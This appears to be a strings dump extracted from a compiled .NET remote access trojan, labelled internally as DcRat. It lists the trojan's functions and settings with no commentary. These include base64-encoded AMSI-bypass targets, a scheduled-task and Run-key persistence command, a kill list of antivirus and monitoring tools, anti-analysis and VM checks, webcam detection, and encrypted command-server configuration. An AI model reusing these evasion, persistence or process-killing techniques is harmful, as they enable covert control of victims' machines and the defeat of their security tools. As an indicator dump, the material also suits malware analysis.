!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<>c__DisplayClass5_0
<GetFiltes>b__0
<>p__0
IEnumerable`1
CallSite`1
List`1
PROCESSENTRY32
kernel32
Microsoft.Win32
ToUInt32
ToInt32
SwapInt32
X509Certificate2
<>o__53
Func`3
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
ToUInt16
ToInt16
SwapInt16
HMACSHA256
Aes256
aes256
__StaticArrayInitTypeSize=6
get_UTF8
<Module>
<PrivateImplementationDetails>
PatchA
LoadLibraryA
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
GetTypeFromCLSID
th32ModuleID
th32DefaultHeapID
th32ProcessID
th32ParentProcessID
get_FormatID
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
LASTINPUTINFO
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
Camera
havecamera
ReadServertData
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
dwProcessId
processId
EndRead
BeginRead
BlockThread
InnerAdd
SHA256Managed
get_Enabled
set_Enabled
get_Connected
get_IsConnected
set_IsConnected
Received
get_Guid
<SendSync>k__BackingField
<Enabled>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<ActivatePo_ng>k__BackingField
<Ping>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
Append
RegistryValueKind
method
Replace
CreateInstance
source
exitCode
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
utf8Encode
DeleteSubKeyTree
BindToStorage
cntUsage
get_Message
EndInvoke
BeginInvoke
IEnumerable
IDisposable
ToDouble
SwapDouble
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
dwProcessHandle
WaitHandle
bInheritHandle
handle
WriteSingle
ToSingle
SetAsSingle
Install_File
szExeFile
DecodeFromFile
SaveBytesToFile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
PropName
get_UserName
lowerName
SetName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
dwTime
WriteLine
Combine
ComInterfaceType
UriHostNameType
get_ValueType
valueType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
System.Core
Server_signa_ture
pcPriClassBase
Dispose
Certifi_cate
X509Certificate
Server_Certificate
ValidateServerCertificate
certificate
Create
MulticastDelegate
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
innerValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
jesus.exe
get_Size
cbSize
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
SizeOf
IndexOf
IID_IPropertyBag
strFlag
CryptoConfig
get_ActivatePo_ng
set_ActivatePo_ng
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
ClearSetting
System.Drawing
ErrorLog
set_ErrorDialog
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
EndsWith
LoadApi
CreateApi
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
unpack_msgpack
RegistryKeyPermissionCheck
FlushFinalBlock
StopBlock
StartBlock
strVal
RtlSetProcessIsCritical
ProcessCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
In_stall
Client.Install
kernel32.dll
user32.dll
ntdll.dll
WriteNull
SetAsNull
MutexControl
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
Program
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
CLSID_SystemDeviceEnum
MsgPackEnum
ICreateDevEnum
WriteBoolean
ToBoolean
SetAsBoolean
HwidGen
children
X509Chain
AppDomain
get_CurrentDomain
Paste_bin
IsAdmin
Ver_sion
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
set_Position
position
CryptographicException
ArgumentNullException
get_InnerException
ArgumentException
StringComparison
Unknown
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
WriteMap
PreventSleep
currentApp
Microsoft.CSharp
NormalStartup
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Install_Folder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
ManagementObjectSearcher
IMoniker
IEnumMoniker
ppEnumMoniker
moniker
SessionEndingEventHandler
Client.Helper
isVM_by_wim_temper
ToUpper
CurrentUser
StreamWriter
TextWriter
GetDelegateForFunctionPointer
BitConverter
ToLower
IEnumerator
CreateClassEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
UIntPtr
System.Diagnostics
cntThreads
NativeMethods
Microsoft.VisualBasic.Devices
FindDevices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
Matches
ExpandEnvironmentVariables
System.Runtime.InteropServices.ComTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
GetFiltes
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
dwFlags
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
System.Collections
StringSplitOptions
RemoveLastChars
GetImageDecoders
EnumMonikers
RuntimeHelpers
SslPolicyErrors
sslPolicyErrors
Bypass
dwDesiredAccess
FileAccess
Anti_Process
TerminateProcess
hProcess
AntiProcess
KillProcess
OpenProcess
GetCurrentProcess
IPAddress
GetProcAddress
lpAddress
Compress
Decompress
Por_ts
Hos_ts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
Concat
ImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ForcePathObject
ReleaseComObject
ManagementObject
object
Collect
Connect
Reconnect
lpflOldProtect
DelegateVirtualProtect
flNewProtect
System.Net
Target
target
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
is64Bit
op_Explicit
ClientOnExit
get_Default
IAsyncResult
result
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
get_RemoteEndPoint
get_Count
get_ProcessorCount
amount
CreateToolhelp32Snapshot
hSnapshot
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
ToList
Process32First
Process32Next
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
VirtualAllocEx
CloseMutex
CreateMutex
IBindCtx
De_lay
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
masterKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
WriteBinary
ToBinary
ObjectQuery
SelectQuery
CLSID_VideoInputDeviceCategory
category
get_SystemDirectory
SetRegistry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
ControlThread
WrapNonExceptionThrows
1.0.7.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$29840822-5B84-11D0-BD3B-00A0C911CE86
$55272A00-42CB-11CE-8135-00AA004BB851
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.7.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
SHA256
5qBTrPuiDuJJ8QWa/8RoTFMBDdM1WzxTh1zGts7Ibbv7FM7g5ysWhTINyoP+RRKw6SPuf1gvBIqpYSNVCbjwVg==
nJpNo8aJDVdFB9kDjx9cA3Dny8yhoA48O0J2ITPi000xz839TnzfzhYxHhHtRJrGCVofyig7BQ/n2MgO2JYSGg==
W/k0C3e0W37o7KrvIHCV6Ftics6/KMIv/ga5MV4VTQc+/WY7DLAfMui21HnaBGFatD3YuGo9VzPSH97cvcwFOg==
AgmsykIBjUH7R4G9/IWSDSjpU8tlkXGENdH5ASorE3lnnLUX+zTXsFyJ7u9BxsQDsF4f+xbTtD7t00gs4vUN3A==
%AppData%
R0p5bW9XU0hsTEJzV2xNQjBXY3FQWWxxMnZoRHU3elY=
0HRgSxXU6f6URlKLbVX9ztgFw1RFNNguk1N8WDPue4Jn24ns9LlAbn0V+PBHaoOQl8NlhegwTr5gvZXB3v/qyZNEH50mpe1Rq8rJ2BCIxnM=
R0aAC3yPilTuW4lwBApdQJgipZ6tggTJtpGEvTanu+7VLKZyDmMsw3AyZ29xom/WfgKkcXo5BiBfmf6gYHb0bylnhBPQdxFVyF3rxpdU6Qf0wSUSfoUUoHLWzgpZbV8xFeEZPTbxSvK7MGPzYvj6KSerKXmpqaNTc043SkvM8i5ef3obyaaTGKkdSEY+hnKhDi+5x/v0oOy88tuuuwTF5qFWvFs9rugUfjGvXtTL2Bj7Yoc0AMSi082DiLjRQe8rVZtj7ReYhyaGntZzgLuxolvMr3PViU8q4rE0WR9g4jg7zNvf6CnVaBmM0rwyewVYudxBHRri11CQid1l1Kk6Md2e6lkCQ0D+9IyKQZhNiYRlAjpdxqF3D/2bhIq4NB2U2m6S+3ixU5spu6g1gCn5rDgrRy1J83Sccxz8nx2w+6u1mGRI3wI9AuxO+c2xcdnbHozRU4IFH1noh2AxgjAdf68dprpFkzJ9+A1ZMRy1tipUisvV40z9aK7IM6fbc1dMLiBtctgIeFtpysiT5xHfvIBTkq+bSCrT0CJMY75AvbBIUwq8LCz4HmpyncVm/3l/iN11xaOuZh+nT7/cYSPDxNOINLooy+9mKuEChMMiHXiJiLCJMfVGaZocwH8CmwtOhxTeCCDOmPbErX7lFZLtDz8GXVeYb66Obrjkm6jeHIDkfBha0WPNokw79AEsD9FOSnx3LDhiW6ovuICBYhyvFHNKocj9XyX2eGQ5pfIko1yW9ISV0Q/fLPM3IMRigqOncvF8ZoQAQZ0rm0UB55CwG1lzvtP9llpVX8wuHVprt8Cy4KdC4HO+vvdRMTnP6gmL6ZqLqaZgHAiHThxd87tuXjoaxK94MZMCelqhMGt/wUKN0YUE4aVePrjQTYz69Q0MZ8N/s1Z5SlNyFnXtCmMmmJRsm6YBePp3nLebXnA4ajgdt6bIWXAwryu4SCOVqej27Bsid9pigdsNq0dHQiIh+IyDNYBgrZuuSvJmOIZWBjqPtI2F3IxJ7rx9LKaTi4uW
Xie3MPxzTBdGIwU+SttoMHtWM7+ubIbI5OJgaOClpQ9I1GXw2s1UvlkyO2y3T55EKvhqFYV68O5qzBy4J+I5cAEKP2H03us5y9zzmLs7sMXSn8pjOBLPmel7RIGF0yV+fy+gYwjEm+whviRxrB0iR97jwmoGzrRZthoVgka/927t3GncCQVll3p2G+94GvaorrdL27BajvDGWCK/4M2FHq4eYM00HMErNyHDC/lDZdjxw3OcfakDLBRBPP01a8o24qnOoNTRjJ8ndVV4gPeuFnSmSGeF5e5Imr7UZrGH/+o=
T4Ay35FErDIBnKNXcdKFp7M7uL1nLki+4mq+zeEj3zSBE9+YIvRgW2WXhs8nlB3mhAd4fN6EgRhh/gNrrlDq1Q==
M44BLx47dUKTTBxaJTimk6iNJU+8RdnqAUrwCOYJVhOkYIzwCirD1FJjr/weHzlc9lW42sdky66SI4LRKOOnlg==
Q0wm842KzzBeuRV+SlSoCMMdONocNYVi1lvHILnxgj+el9RHVfgFa2j9nPwURz9V8ZO480DLQjNvIzUgpYTc5g==
7ihSt8KMktRTz182k5PN5k7b+m7I5vRvzYWWjIkuuldhVF/705kIKTBCKU54vE9WJ7kfSamglJuRFBqCw0IwoQ==
3HtMUQmPqimK6/MsK2qXesUoJiMrmA5RuXM8CaAu5aABvXjdFSP5SNVu4sp1RR3jknrpYOnbv+jIOhpE0bmw9Q==
Pac_ket
Message
plu_gin
save_Plugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
UmVjZWl2ZWQ=
uFcAB4
DCGAA=
YW1zaS5kbGw=
QW1zaVNjYW5CdWZmZXI=
[x] {0}
kernel32
VmlydHVhbFByb3RlY3Q=
L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
" /tr '"
"' & exit
U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
@echo off
timeout 3 > NUL
START "" "
" /f /q
Taskmgr.exe
ProcessHacker.exe
procexp.exe
MSASCui.exe
MsMpEng.exe
MpUXSrv.exe
MpCmdRun.exe
NisSrv.exe
ConfigSecurityPolicy.exe
MSConfig.exe
Regedit.exe
UserAccountControlSettings.exe
taskkill.exe
Select * from Win32_CacheMemory
{860BB310-5D01-11d0-BD3B-00A0C911CE86}
{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
{55272A00-42CB-11CE-8135-00AA004BB851}
FriendlyName
Err HWID
ClientInfo
Microsoft
Camera
Version
Perfor_mance
Paste_bin
Anti_virus
Install_ed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Unknown
Environment
windir
Software
Classes
mscfile
ms-settings
Software\
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
DcRatByqwqdanchun
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.7.0
InternalName
Client.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Client.exe
ProductName
ProductVersion
1.0.7.0
Assembly Version
1.0.7.0